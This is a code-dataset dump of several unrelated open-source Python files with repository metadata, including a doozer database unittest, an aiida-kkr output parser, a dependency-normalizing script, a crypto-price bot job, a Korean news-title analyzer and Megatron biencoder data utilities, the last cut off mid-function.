'aspect_ratios' : ((0.5, 1.0, 2.0),) * len(chuman_anchors)}
combined_anchors = {'anchor_sizes' : comb_anchors,
'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(comb_anchors)}
headhunt_anchors = {'anchor_sizes' : hh_anchors,
'aspect_ratios' : ((0.5, 1.0, 1.5),) * len(hh_anchors)} | 34.521739 | 77 | 0.549118 |
d4837cacfc1bff3a5e939855ed791222efe603da | 5,411 | py | Python | tests/test_dblib.py | locriandev/doozer | 375eafccc15aadfd18dc50061eccb9a917d31b0b | [
"Apache-2.0"
] | 16 | 2018-11-06T16:49:03.000Z | 2021-11-07T19:48:49.000Z | tests/test_dblib.py | locriandev/doozer | 375eafccc15aadfd18dc50061eccb9a917d31b0b | [
"Apache-2.0"
] | 479 | 2018-11-15T15:37:49.000Z | 2022-03-31T08:39:44.000Z | tests/test_dblib.py | locriandev/doozer | 375eafccc15aadfd18dc50061eccb9a917d31b0b | [
"Apache-2.0"
] | 38 | 2018-11-07T14:33:15.000Z | 2021-12-13T13:59:12.000Z | import unittest
from doozerlib.dblib import DB, Record
from multiprocessing import RLock, Lock, Semaphore
import logging
import datetime
import pathlib
import traceback
import sys
import mock
class FakeMetaData(object):
def __init__(self):
self.name = "test"
self.namespace = "test_namespace"
self.qualified_key = "test_qualified_key"
self.qualified_name = "test_qualified_name"
class FakeRuntime(object):
"""This is a fake runtime class to inject into dblib running tests."""
mutex = RLock()
def __init__(self):
self.logger = logging.getLogger(__name__)
# Create a "uuid" which will be used in FROM fields during updates
self.uuid = datetime.datetime.now().strftime("%Y%m%d.%H%M%S")
self.user = ""
self.group_config = dict()
self.group_config["name"] = "test"
# Cooperative threads can request exclusive access to directories.
# This is usually only necessary if two threads want to make modifications
# to the same global source alias. The empty string key serves as a lock for the
# data structure.
self.dir_locks = {'': Lock()}
# See get_named_semaphore. The empty string key serves as a lock for the data structure.
self.named_semaphores = {'': Lock()}
def get_named_lock(self, absolute_path):
with self.dir_locks['']:
p = pathlib.Path(absolute_path).absolute() # normalize (e.g. strip trailing /)
if p in self.dir_locks:
return self.dir_locks[p]
else:
new_lock = Lock()
self.dir_locks[p] = new_lock
return new_lock
def get_named_semaphore(self, lock_name, is_dir=False, count=1):
"""
Returns a semaphore (which can be used as a context manager). The first time a lock_name
is received, a new semaphore will be established. Subsequent uses of that lock_name will
receive the same semaphore.
:param lock_name: A unique name for resource threads are contending over. If using a directory name
as a lock_name, provide an absolute path.
:param is_dir: The lock_name is a directory (method will ignore things like trailing slashes)
:param count: The number of times the lock can be claimed. Default=1, which is a full mutex.
:return: A semaphore associated with the lock_name.
"""
with self.named_semaphores['']:
if is_dir:
p = '_dir::' + str(pathlib.Path(str(lock_name)).absolute()) # normalize (e.g. strip trailing /)
else:
p = lock_name
if p in self.named_semaphores:
return self.named_semaphores[p]
else:
new_semaphore = Semaphore(count)
self.named_semaphores[p] = new_semaphore
return new_semaphore
@staticmethod
def timestamp():
return datetime.datetime.utcnow().isoformat()
class DBLibTest(unittest.TestCase):
def setUp(self):
self.setup_failed = False
try:
self.fake_runtime = FakeRuntime()
self.db = DB(runtime=self.fake_runtime, environment="test")
except Exception:
traceback.print_exc()
self.setup_failed = True
def test_select_withoutenv(self):
if not self.setup_failed:
self.assertEqual(len(self.db.select("select * from test", 10)), 0)
def test_record(self):
if not self.setup_failed:
try:
with self.db.record(operation="build", metadata=None):
Record.set("name", "test")
Record.set("position", "record")
with self.db.record(operation="build", metadata=None):
Record.set("name", "test2")
Record.set("position", "record2")
Record.set("position2", "r_record2")
except Exception:
self.fail(msg="Failed to record.")
else:
self.skipTest(reason="DB setup failed for running test.")
def test_record_with_metadata(self):
if not self.setup_failed:
try:
with self.db.record(operation="build", metadata=FakeMetaData()):
Record.set("name", "test")
Record.set("position", "record")
Record.set("country", "USA")
Record.set("population", 45435432523)
except Exception:
self.fail(msg="Failed to create record with extras.")
else:
self.skipTest(reason="DB setup failed for running test.")
def test_record_with_empty_value(self):
if not self.setup_failed:
try:
with self.db.record(operation='build', metadata=None):
Record.set("name", "test")
Record.set("position", None)
Record.set("country", "")
Record.set("population", 0)
except Exception:
self.fail(msg="Failed to create record with missing attribute value.")
else:
self.skipTest(reason="DB setup failed for running test.")
def tearDown(self):
pass
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout)
unittest.main()
| 35.598684 | 112 | 0.592682 |
4abd04b3f188f7f0c8e38cb8fdf5d6f743626599 | 394 | py | Python | neurodsp/plts/__init__.py | elybrand/neurodsp | 96355f4c75e1eedef2a77a8bfafc718f80b8dae3 | [
"Apache-2.0"
] | null | null | null | neurodsp/plts/__init__.py | elybrand/neurodsp | 96355f4c75e1eedef2a77a8bfafc718f80b8dae3 | [
"Apache-2.0"
] | null | null | null | neurodsp/plts/__init__.py | elybrand/neurodsp | 96355f4c75e1eedef2a77a8bfafc718f80b8dae3 | [
"Apache-2.0"
] | null | null | null | """Plotting functions."""
from .time_series import plot_time_series, plot_bursts, plot_instantaneous_measure
from .filt import plot_filter_properties, plot_frequency_response, plot_impulse_response
from .rhythm import plot_swm_pattern, plot_lagged_coherence
from .spectral import (plot_power_spectra, plot_spectral_hist,
plot_scv, plot_scv_rs_lines, plot_scv_rs_matrix)
| 49.25 | 88 | 0.814721 |
2513075704ca69a5b4da09cad0785566130d8fc4 | 9,554 | py | Python | aiida_kkr/parsers/kkr.py | markusstruckmann/aiida-kkr | 5ce20a61a667787aeb68fa0c8b81e73aa3cf94a5 | [
"MIT"
] | 6 | 2018-11-16T10:44:06.000Z | 2021-02-09T15:38:51.000Z | aiida_kkr/parsers/kkr.py | RubelMozumder/aiida-kkr | 1db3d57626c27f2a7105d587dfb8543269ce6c00 | [
"MIT"
] | 63 | 2018-11-27T10:43:49.000Z | 2022-02-10T11:10:16.000Z | aiida_kkr/parsers/kkr.py | RubelMozumder/aiida-kkr | 1db3d57626c27f2a7105d587dfb8543269ce6c00 | [
"MIT"
] | 9 | 2018-11-09T09:52:16.000Z | 2021-12-10T18:09:11.000Z | # -*- coding: utf-8 -*-
"""
Parser for the KKR Code.
The parser should never fail, but it should catch
all errors and warnings and show them to the user.
"""
from __future__ import absolute_import
from aiida.parsers.parser import Parser
from aiida.orm import Dict
from aiida_kkr.calculations.kkr import KkrCalculation
from aiida.common.exceptions import InputValidationError
from masci_tools.io.parsers.kkrparser_functions import parse_kkr_outputfile, check_error_category
from masci_tools.io.common_functions import search_string
__copyright__ = (u"Copyright (c), 2017, Forschungszentrum Jülich GmbH, "
"IAS-1/PGI-1, Germany. All rights reserved.")
__license__ = "MIT license, see LICENSE.txt file"
__version__ = "0.6.3"
__contributors__ = ("Jens Broeder", u"Philipp Rüßmann")
class KkrParser(Parser):
"""
Parser class for parsing output of KKR code..
"""
def __init__(self, calc):
"""
Initialize the instance of KkrParser
"""
# needed for KKRimporter parser
self.icrit = 0
self._ParserVersion = __version__
#reuse init of base class
super(KkrParser, self).__init__(calc)
# pylint: disable=protected-access
def parse(self, **kwargs):
"""
Parse output data folder, store results in database.
:param retrieved: a dictionary of retrieved nodes, where
the key is the link name
:returns: a tuple with two values ``(bool, node_list)``,
where:
* ``bool``: variable to tell if the parsing succeeded
* ``node_list``: list of new nodes to be stored in the db
(as a list of tuples ``(link_name, node)``)
"""
success = False
node_list = ()
# Get retrieved folders
try:
out_folder = self.retrieved
except exceptions.NotExistent:
return self.exit_codes.ERROR_NO_RETRIEVED_FOLDER
# check what is inside the folder
list_of_files = out_folder._repository.list_object_names()
# we need at least the output file name as defined in calcs.py
if KkrCalculation._DEFAULT_OUTPUT_FILE not in list_of_files:
msg = "Output file '{}' not found in list of files: {}".format(KkrCalculation._DEFAULT_OUTPUT_FILE, list_of_files)
if self.icrit==0: # this check turns this off for the KKRimporter calculation
self.logger.error(msg)
return self.exit_codes.ERROR_NO_OUTPUT_FILE
# determine whether or not everything should be parsed or not (e.g. qdos option)
skip_mode = False
only_000_present = False
with out_folder.open(KkrCalculation._INPUT_FILE_NAME) as file:
txt = file.readlines()
itmp = search_string('RUNOPT', txt)
if itmp>=0:
runopts = txt[itmp+1]
if 'qdos' in runopts:
skip_mode = True
if 'KKRFLEX' in runopts:
only_000_present = True
# now collect the rest of the files
file_errors = []
# Parse output files of KKR calculation
if KkrCalculation._DEFAULT_OUTPUT_FILE in out_folder.list_object_names():
outfile = out_folder.open(KkrCalculation._DEFAULT_OUTPUT_FILE)
else:
file_errors.append((1+self.icrit, msg))
outfile = None
# get path to files and catch errors if files are not present
# append tupels (error_category, error_message) where error_category is
# 1: critical error, always leads to failing of calculation
# 2: warning, is inspected and checked for consistency with read-in
# out_dict values (e.g. nspin, newsosol, ...)
fname = KkrCalculation._OUTPUT_0_INIT
if fname in out_folder.list_object_names():
outfile_0init = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUTPUT_0_INIT not found {}".format(fname)))
outfile_0init = None
fname = KkrCalculation._OUTPUT_000
if fname in out_folder.list_object_names():
outfile_000 = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUTPUT_000 not found {}".format(fname)))
outfile_000 = None
fname = KkrCalculation._OUTPUT_2
if fname in out_folder.list_object_names():
outfile_2 = out_folder.open(fname)
else:
if not only_000_present:
file_errors.append((1+self.icrit, "Critical error! OUTPUT_2 not found {}".format(fname)))
outfile_2 = None
else:
outfile_2 = outfile_000
fname = KkrCalculation._OUT_POTENTIAL
if fname in out_folder.list_object_names():
potfile_out = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUT_POTENTIAL not found {}".format(fname)))
potfile_out = None
fname = KkrCalculation._OUT_TIMING_000
if fname in out_folder.list_object_names():
timing_file = out_folder.open(fname)
else:
file_errors.append((1+self.icrit, "Critical error! OUT_TIMING_000 not found {}".format(fname)))
timing_file = None
fname = KkrCalculation._NONCO_ANGLES_OUT
if fname in out_folder.list_object_names():
nonco_out_file = out_folder.open(fname)
else:
file_errors.append((2, "Error! NONCO_ANGLES_OUT not found {}".format(fname)))
nonco_out_file = None
out_dict = {'parser_version': self._ParserVersion,
'calculation_plugin_version': KkrCalculation._CALCULATION_PLUGIN_VERSION}
#TODO job title, compound description
success, msg_list, out_dict = parse_kkr_outputfile(out_dict, outfile,
outfile_0init, outfile_000,
timing_file, potfile_out,
nonco_out_file, outfile_2,
skip_readin=skip_mode)
# try to parse with other combinations of files to minimize parser errors
if self.icrit != 0:
self.logger.info('msg_list0: {}'.format(msg_list))
# try second combination of files
out_dict2 = out_dict.copy()
success2, msg_list2, out_dict2 = parse_kkr_outputfile(out_dict2, outfile_2,
outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file,
outfile_2, skip_readin=skip_mode)
self.logger.info('msg_list1: {}'.format(msg_list2))
if len(msg_list2)<len(msg_list): # overwrite parser outputs if fewer errors
self.logger.info('take output of parser run 1')
success, msg_list, out_dict = success2, msg_list2, out_dict2
# try third combination of files
out_dict2 = out_dict.copy()
success2, msg_list2, out_dict2 = parse_kkr_outputfile(out_dict2, outfile_000,
outfile_0init, outfile_000, timing_file, potfile_out, nonco_out_file,
outfile_2, skip_readin=skip_mode)
self.logger.info('msg_list2: {}'.format(msg_list2))
if len(msg_list2)<len(msg_list): # overwrite parser outputs if fewer errors
self.logger.info('take output of parser run 2')
success, msg_list, out_dict = success2, msg_list2, out_dict2
out_dict['parser_errors'] = msg_list
# add file open errors to parser output of error messages
for (err_cat, f_err) in file_errors:
if err_cat == 1:
msg_list.append(f_err)
elif check_error_category(err_cat, f_err, out_dict):
msg_list.append(f_err)
else:
if 'parser_warnings' not in list(out_dict.keys()):
out_dict['parser_warnings'] = []
out_dict['parser_warnings'].append(f_err.replace('Error', 'Warning'))
out_dict['parser_errors'] = msg_list
#create output node and link
self.out('output_parameters', Dict(dict=out_dict))
if self.icrit != 0 and not success: # overwrite behavior with KKRimporter
success = True # set automatically to True even if only partial output was parsed
msg = "Automatically returned success=True for KKR importer although some parsing errors occurred"
self.logger.warning(msg)
if not success:
return self.exit_codes.ERROR_KKR_PARSING_FAILED
else: # cleanup after parsing (only if parsing was successful)
# delete completely parsed output files
self.remove_unnecessary_files()
# then (maybe) tar the output to save space
#TODO needs implementing (see kkrimp parser)
def remove_unnecessary_files(self):
"""
Remove files that are not needed anymore after parsing
The information is completely parsed (i.e. in outdict of calculation)
and keeping the file would just be a duplication.
"""
files_to_delete = [KkrCalculation._POTENTIAL,
KkrCalculation._SHAPEFUN]
for fileid in files_to_delete:
if fileid in self.retrieved.list_object_names():
self.retrieved.delete_object(fileid, force=True)
| 44.02765 | 126 | 0.623613 |
84b05d1a7a94cb09f625fa7f7ace2201ac1d0cff | 594 | py | Python | ray_beam_runner/util.py | pabloem/ray_beam_runner | ec884d66067071f44eff7ca4be032474e2261e93 | [
"Apache-2.0"
] | 12 | 2022-01-13T05:58:45.000Z | 2022-03-31T23:05:59.000Z | ray_beam_runner/util.py | pabloem/ray_beam_runner | ec884d66067071f44eff7ca4be032474e2261e93 | [
"Apache-2.0"
] | 7 | 2022-02-23T09:58:54.000Z | 2022-03-29T21:44:53.000Z | ray_beam_runner/util.py | pabloem/ray_beam_runner | ec884d66067071f44eff7ca4be032474e2261e93 | [
"Apache-2.0"
] | 3 | 2022-02-23T04:28:08.000Z | 2022-03-13T19:15:35.000Z | import ray
from apache_beam.pipeline import PipelineVisitor
class PipelinePrinter(PipelineVisitor):
def visit_value(self, value, producer_node):
print(f"visit_value(value, {producer_node.full_label})")
def visit_transform(self, transform_node):
print(f"visit_transform({type(transform_node.transform)})")
def enter_composite_transform(self, transform_node):
print(f"enter_composite_transform({transform_node.full_label})")
def leave_composite_transform(self, transform_node):
print(f"leave_composite_transform({transform_node.full_label})")
| 34.941176 | 72 | 0.765993 |
203f4e693b3cb361ddd7e6c0003d0073a15911b8 | 249 | py | Python | test/gallery/proteinsignal/testChemotaxis.py | jeanqasaur/jeeves | 1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4 | [
"MIT"
] | 253 | 2015-01-02T01:54:27.000Z | 2022-03-10T01:44:02.000Z | test/gallery/proteinsignal/testChemotaxis.py | jeanqasaur/jeeves | 1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4 | [
"MIT"
] | 4 | 2015-06-09T03:36:28.000Z | 2017-08-11T15:54:24.000Z | test/gallery/proteinsignal/testChemotaxis.py | jeanqasaur/jeeves | 1b5783a98f88fa2fc9e4cae7e005d2c9242cfea4 | [
"MIT"
] | 29 | 2015-02-14T02:24:08.000Z | 2021-12-16T02:46:16.000Z | import JeevesLib
from smt.Z3 import *
import unittest
from RSphaeroides import RSphaeroides
import JeevesLib
class TestAuction(unittest.TestCase):
def setUp(self):
JeevesLib.init()
def test_something(self):
r = RSphaeroides()
pass
| 17.785714 | 37 | 0.75502 |
84c0faf62ebb6df665e10c17de64d236f891e58b | 895 | py | Python | examples/bots/bot 1/job.py | Sal0hc1n/crypto-price-api | d5580ca3a0f0267e73927212d8b182a4d2e5db8e | [
"MIT"
] | null | null | null | examples/bots/bot 1/job.py | Sal0hc1n/crypto-price-api | d5580ca3a0f0267e73927212d8b182a4d2e5db8e | [
"MIT"
] | null | null | null | examples/bots/bot 1/job.py | Sal0hc1n/crypto-price-api | d5580ca3a0f0267e73927212d8b182a4d2e5db8e | [
"MIT"
] | null | null | null | from bot.App import bot
from bot import crud
from bot import coin
def user_job(chat_id):
user = crud.get_user(chat_id)
new_value = coin.get_current_value()
diff = new_value - user.value
if abs(diff) > user.overweight:
crud.update_value(chat_id, new_value)
prefix = "Up" if diff > 0 else "Down"
body = prefix + ": " + str(new_value) + " | Diff: " + str(int(diff))
bot.send_message(chat_id, body)
if new_value > user.max_value:
body = "Alert! Rose higher: " + str(user.max_value) + " | " + " Current: " + str(new_value)
crud.update_max_value(chat_id, new_value)
bot.send_message(chat_id, body)
if new_value < user.min_value:
body = "Alert! Fell below: " + str(user.min_value) + " | " + " Current: " + str(new_value)
crud.update_min_value(chat_id, new_value)
bot.send_message(chat_id, body)
| 37.291667 | 99 | 0.631285 |
55d21d5afd2aaf91df16908d5df7eecad3784c55 | 3,848 | py | Python | scripts/01_normalize_packages.py | facade-technologies-inc/facile | 4c9134dced71734641fed605e152880cd9ddefe3 | [
"MIT"
] | 2 | 2020-09-17T20:51:18.000Z | 2020-11-03T15:58:10.000Z | scripts/01_normalize_packages.py | facade-technologies-inc/facile | 4c9134dced71734641fed605e152880cd9ddefe3 | [
"MIT"
] | 97 | 2020-08-26T05:07:08.000Z | 2022-03-28T16:01:49.000Z | scripts/01_normalize_packages.py | facade-technologies-inc/facile | 4c9134dced71734641fed605e152880cd9ddefe3 | [
"MIT"
] | null | null | null | import os
import pygit2
import pip
import subprocess
temp_req_file = "temp_requirements.txt"
perm_req_file = "../requirements.txt"
# Mapping of dependencies to download and install from Facade Technologies github
# These are generally repositories that needed to be forked and modified to work with Facile.
requirements_from_source = {
"qtmodern": ("https://github.com/facade-technologies-inc/qtmodern.git", "master"),
"qnotifications": ("https://github.com/facade-technologies-inc/QNotifications", "master"),
}
if __name__ == "__main__":
# -- Get current list of installed packages. -----------------------------------------------------------------------
os.system(f"pip freeze > {temp_req_file}")
with open(temp_req_file) as f:
cur_reqs = set(f.readlines())
os.remove(temp_req_file)
# -- Get list of necessary requirements ----------------------------------------------------------------------------
with open(perm_req_file) as f:
needed_reqs = set(f.readlines())
# -- Determine which requirements we have, need to get rid of, or need to install. ---------------------------------
unnecessary_packages = [p for p in cur_reqs - needed_reqs if p not in requirements_from_source]
have_packages = cur_reqs.intersection(needed_reqs)
needed_packages = list(needed_reqs - cur_reqs)
# -- Uninstall unnecessary packages --------------------------------------------------------------------------------
for package in unnecessary_packages:
print(f"Uninstalling {package}")
os.system(f"pip uninstall -y {package} 1>nul 2>&1")
# -- Install all required dependencies (if not installing from source) ---------------------------------------------
for package in needed_packages:
stripped_package = package.replace("="," ").replace(">", " ").replace("<", " ").split()[0].lower()
if stripped_package not in requirements_from_source:
os.system(f"pip install --no-deps {package} 1>nul 2>&1")
# -- Clone/Pull any dependencies which are not hosted on PyPi) -----------------------------------------------------
for package, repo in requirements_from_source.items():
url, branchName = repo
repo_path = os.path.normpath(os.path.join(os.path.dirname(__file__), "../../", package))
# if the repo already exists, switch to the target branch and pull
if os.path.exists(repo_path):
print('')
print(f"Pulling: {package} @ branch: {branchName}")
repoObj = pygit2.Repository(os.path.join(repo_path, ".git"))
branch = repoObj.lookup_branch(branchName)
ref = repoObj.lookup_reference(branch.name)
repoObj.checkout(ref)
freeze_loc = os.getcwd()
os.chdir(repo_path)
output = subprocess.check_output(["git", "pull"])
os.chdir(freeze_loc)
else:
print(f"Cloning: {package} @ branch: {branchName}")
pygit2.clone_repository(url, repo_path, checkout_branch=branchName)
print(f"Installing from source: {package}")
pip.main(["install", repo_path])
print('')
# -- Print a report of what was done -------------------------------------------------------------------------------
report = {
"These are extra (we uninstalled them for you)": unnecessary_packages,
"You have these required packages already (no action)": have_packages,
"You need these packages (we installed them for you)": needed_packages,
"We also pulled the following packages from github": requirements_from_source.keys()
}
for x, l in report.items():
l = '\t'.join(l).rstrip() if l != [] else None
print("\n{x}:\n\t{l}".format(x=x, l=l))
print() # extra whitespace to look good
| 44.744186 | 120 | 0.577183 |
528081bc1135c81bfd23288211c3cf7d0eb0fd4e | 1,002 | py | Python | setup.py | choi-jiwoo/pyrich | 21f2b2196803ea18d50f904b90a0d7598c183345 | [
"MIT"
] | null | null | null | setup.py | choi-jiwoo/pyrich | 21f2b2196803ea18d50f904b90a0d7598c183345 | [
"MIT"
] | null | null | null | setup.py | choi-jiwoo/pyrich | 21f2b2196803ea18d50f904b90a0d7598c183345 | [
"MIT"
] | null | null | null | from setuptools import setup
from setuptools import find_packages
from pyrich import __version__ as VERSION
description = 'My own portfolio management service'
project_urls = {
'Source': 'https://github.com/choi-jiwoo/pyrich',
}
with open('README.md', 'r') as f:
long_description = f.read()
install_requires = [
]
setup(
name='pyrich',
version=VERSION,
author='Choi Ji Woo',
author_email='cho2.jiwoo@gmail.com',
description=description,
long_description=long_description,
long_description_content_type='text/markdown',
packages=find_packages(),
install_requires=install_requires,
license='MIT',
project_urls=project_urls,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Education',
'Programming Language :: Python :: 3',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
],
entry_points={'console_scripts': ['pyrich=pyrich.control:run']},
)
| 27.081081 | 68 | 0.683633 |
4a47c90da60ee9161a7cf362717cad63521c60a4 | 2,602 | py | Python | nt-worker/Analysis/AnalysisTitle.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | 1 | 2022-02-25T02:35:09.000Z | 2022-02-25T02:35:09.000Z | nt-worker/Analysis/AnalysisTitle.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | nt-worker/Analysis/AnalysisTitle.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | # from eunjeon import Mecab
from konlpy.tag import Mecab
class AnalysisTitle(object):
def __init__(self, inputTitle):
self.TitleText = self.preProcessTitle(inputTitle) #제목 내용
self.TitleMecabTag = self.getMecabTag() #제목 mecab tag
self.TitleLen = self.getTitleLen() #제목 길이
self.QuestionMarkCount = self.getQuestionMarkCount() #제목에 물음표 갯수
self.ExclamationMarkCount = self.getExclamationMarkCount() #제목에 느낌표 갯수
self.TitleAdverbsCount = self.getTitleAdverbsNum() #제목에 평균 부사수
self.TitleDoubleQuotationsMarksNum = self.getTitleDoubleQuotationsMarksNum() #제목에 쌍따옴표 갯수
def preProcessTitle(self, title):
value = title.replace("\n\n", "\n")
value = value.replace('‘', '\'', -1)
value = value.replace('’', '\'', -1)
value = value.replace('“', '\"', -1)
value = value.replace('”', '\"', -1)
return value
def getMecabTag(self):
mecab = Mecab()
# mecab = MeCab.Tagger()
mecabTag = mecab.pos(self.TitleText)
# mecabTag = mecab.parse(self.TitleText)
return mecabTag
def getTitleLen(self):
TitleLen = len(self.TitleText)
return TitleLen
def getQuestionMarkCount(self):
count = 0
for val in self.TitleMecabTag:
if 'SF' in val[1]:
if '?' == val[0]:
count += 1
return count
def getExclamationMarkCount(self):
count = 0
for val in self.TitleMecabTag:
if 'SF' in val[1]:
if '!' == val[0]:
count += 1
return count
def getTitleAdverbsNum(self):
count = 0
for val in self.TitleMecabTag:
if 'MAG' in val[1] or 'MAJ' in val[1]:
count += 1
return count
def getTitleDoubleQuotationsMarksNum(self):
count = 0
for val in self.TitleMecabTag:
if 'SY' in val[1]:
if '"' in val[0]:
count += 1
return count
def PrintMyValue(self):
print('----------print Analysis Title----------')
print('TitleText : ', self.TitleText)
print('TitleMecabTag : ', self.TitleMecabTag)
print('TitleLen : ', self.TitleLen)
print('QuestionMarkCount : ', self.QuestionMarkCount)
print('ExclamationMarkCount : ', self.ExclamationMarkCount)
print('TitleAdverbsCount : ', self.TitleAdverbsCount)
print('TitleDoubleQuotationsMarksNum : ', self.TitleDoubleQuotationsMarksNum)
print('----------End Analysis Title----------') | 35.643836 | 97 | 0.574942 |
3b2c87e59df9b6f4ef1a87ea5abf99d3a8fffb94 | 687 | py | Python | eka/classes/builders/jinja.py | viswanc/eka | edb0aa373f74ec297d0e35e9cd6d564264322698 | [
"MIT"
] | 1 | 2019-11-03T16:03:59.000Z | 2019-11-03T16:03:59.000Z | eka/classes/builders/jinja.py | viswanc/eka | edb0aa373f74ec297d0e35e9cd6d564264322698 | [
"MIT"
] | null | null | null | eka/classes/builders/jinja.py | viswanc/eka | edb0aa373f74ec297d0e35e9cd6d564264322698 | [
"MIT"
] | null | null | null | r"""
A builder based on Jinja2 Templates.
"""
from laufire.filesys import copyContent, ensureCleanDir, ensureDir, getContent, getPathPairs, getPathType, setContent
from jinja2 import Template
class jinjaBuilder(object):
def __init__(self):
pass
def render(self, templateText, Data):
return Template(templateText).render(Data)
def build(self, srcPath, tgtPath, Data):
ensureCleanDir(tgtPath)
for src, tgt in getPathPairs(srcPath, tgtPath):
if getPathType(src) != 1:
ensureDir(tgt)
elif tgt[-6:] != '.jinja':
copyContent(src, tgt)
else:
setContent(tgt[:-6], Template(getContent(src)).render(Data))
return tgtPath
| 23.689655 | 117 | 0.687045 |
ce63046aa520b39ed884ea82211df4f45f55fff2 | 7,563 | py | Python | megatron/data/biencoder_dataset_utils.py | sourcery-ai-bot/Megatron-LM | f27f44e2c49d1cb39b2288bef6f7d837e11094cb | [
"MIT"
] | null | null | null | megatron/data/biencoder_dataset_utils.py | sourcery-ai-bot/Megatron-LM | f27f44e2c49d1cb39b2288bef6f7d837e11094cb | [
"MIT"
] | null | null | null | megatron/data/biencoder_dataset_utils.py | sourcery-ai-bot/Megatron-LM | f27f44e2c49d1cb39b2288bef6f7d837e11094cb | [
"MIT"
] | null | null | null | import os
import time
import numpy as np
import torch
from megatron import get_args, get_tokenizer, mpu, print_rank_0
from megatron.data.dataset_utils import create_masked_lm_predictions, \
pad_and_convert_to_numpy
from megatron.data.data_samplers import MegatronPretrainingSampler
def make_attention_mask(source_block, target_block):
"""
Returns a 2-dimensional (2-D) attention mask
:param source_block: 1-D array
:param target_block: 1-D array
"""
mask = (target_block[None, :] >= 1) * (source_block[:, None] >= 1)
mask = mask.astype(np.int64)
# (source_length, target_length)
return mask
def get_one_epoch_dataloader(dataset, micro_batch_size=None):
"""Specifically one epoch to be used in an indexing job."""
args = get_args()
if micro_batch_size is None:
micro_batch_size = args.micro_batch_size
num_workers = args.num_workers
# Use megatron's sampler with consumed samples set to 0 as
# this is only for evaluation and don't intend to resume half way.
# Also, set the drop last to false as don't intend to remove
# the last batch
batch_sampler = MegatronPretrainingSampler(
total_samples=len(dataset),
consumed_samples=0,
micro_batch_size=args.micro_batch_size,
data_parallel_rank=mpu.get_data_parallel_rank(),
data_parallel_size=mpu.get_data_parallel_world_size(),
drop_last=False)
return torch.utils.data.DataLoader(dataset,
batch_sampler=batch_sampler,
num_workers=num_workers,
pin_memory=True)
def get_ict_batch(data_iterator):
# Items and their type.
keys = ['query_tokens', 'query_mask',
'context_tokens', 'context_mask', 'block_data']
datatype = torch.int64
# Broadcast data.
data = None if data_iterator is None else next(data_iterator)
data_b = mpu.broadcast_data(keys, data, datatype)
# Unpack.
query_tokens = data_b['query_tokens'].long()
query_mask = data_b['query_mask'] < 0.5
context_tokens = data_b['context_tokens'].long()
context_mask = data_b['context_mask'] < 0.5
block_indices = data_b['block_data'].long()
return query_tokens, query_mask,\
context_tokens, context_mask, block_indices
def join_str_list(str_list):
"""Join a list of strings, handling spaces appropriately"""
return "".join(s[2:] if s.startswith("##") else " " + s for s in str_list)
class BlockSampleData(object):
"""A struct for fully describing a fixed-size block of data as used in REALM
:param start_idx: for first sentence of the block
:param end_idx: for last sentence of the block (may be partially truncated in sample construction)
:param doc_idx: the index of the document from which the block comes in the original indexed dataset
:param block_idx: a unique integer identifier given to every block.
"""
def __init__(self, start_idx, end_idx, doc_idx, block_idx):
self.start_idx = start_idx
self.end_idx = end_idx
self.doc_idx = doc_idx
self.block_idx = block_idx
def as_array(self):
return np.array([self.start_idx, self.end_idx, self.doc_idx, self.block_idx]).astype(np.int64)
def as_tuple(self):
return self.start_idx, self.end_idx, self.doc_idx, self.block_idx
class BlockSamplesMapping(object):
def __init__(self, mapping_array):
# make sure that the array is compatible with BlockSampleData
assert mapping_array.shape[1] == 4
self.mapping_array = mapping_array
def __len__(self):
return self.mapping_array.shape[0]
def __getitem__(self, idx):
"""Get the data associated with an indexed sample."""
return BlockSampleData(*self.mapping_array[idx])
def get_block_samples_mapping(block_dataset, title_dataset, data_prefix, num_epochs,
max_num_samples, max_seq_length, seed, name, use_one_sent_docs=False):
"""Get samples mapping for a dataset over fixed size blocks. This function also requires
a dataset of the titles for the source documents since their lengths must be taken into account.
:return: samples_mapping (BlockSamplesMapping)
"""
if not num_epochs:
if not max_num_samples:
raise ValueError("Need to specify either max_num_samples "
"or num_epochs")
num_epochs = np.iinfo(np.int32).max - 1
if not max_num_samples:
max_num_samples = np.iinfo(np.int64).max - 1
# Filename of the index mapping
indexmap_filename = data_prefix
indexmap_filename += '_{}_indexmap'.format(name)
if num_epochs != (np.iinfo(np.int32).max - 1):
indexmap_filename += '_{}ep'.format(num_epochs)
if max_num_samples != (np.iinfo(np.int64).max - 1):
indexmap_filename += '_{}mns'.format(max_num_samples)
indexmap_filename += '_{}msl'.format(max_seq_length)
indexmap_filename += '_{}s'.format(seed)
if use_one_sent_docs:
indexmap_filename += '_1sentok'
indexmap_filename += '.npy'
# Build the indexed mapping if not exist.
if mpu.get_data_parallel_rank() == 0 and \
not os.path.isfile(indexmap_filename):
print(' > WARNING: could not find index map file {}, building '
'the indices on rank 0 ...'.format(indexmap_filename))
# Make sure the types match the helpers input types.
assert block_dataset.doc_idx.dtype == np.int64
assert block_dataset.sizes.dtype == np.int32
# Build samples mapping
verbose = torch.distributed.get_rank() == 0
start_time = time.time()
print_rank_0(' > building samples index mapping for {} ...'.format(
name))
from megatron.data import helpers
mapping_array = helpers.build_blocks_mapping(
block_dataset.doc_idx,
block_dataset.sizes,
title_dataset.sizes,
num_epochs,
max_num_samples,
max_seq_length - 3, # account for added tokens
seed,
verbose,
use_one_sent_docs)
print_rank_0(' > done building samples index mapping')
np.save(indexmap_filename, mapping_array, allow_pickle=True)
print_rank_0(' > saved the index mapping in {}'.format(
indexmap_filename))
# Make sure all the ranks have built the mapping
print_rank_0(' > elapsed time to build and save samples mapping '
'(seconds): {:4f}'.format(
time.time() - start_time))
# This should be a barrier but nccl barrier assumes
# device_index=rank which is not the case for model
# parallel case
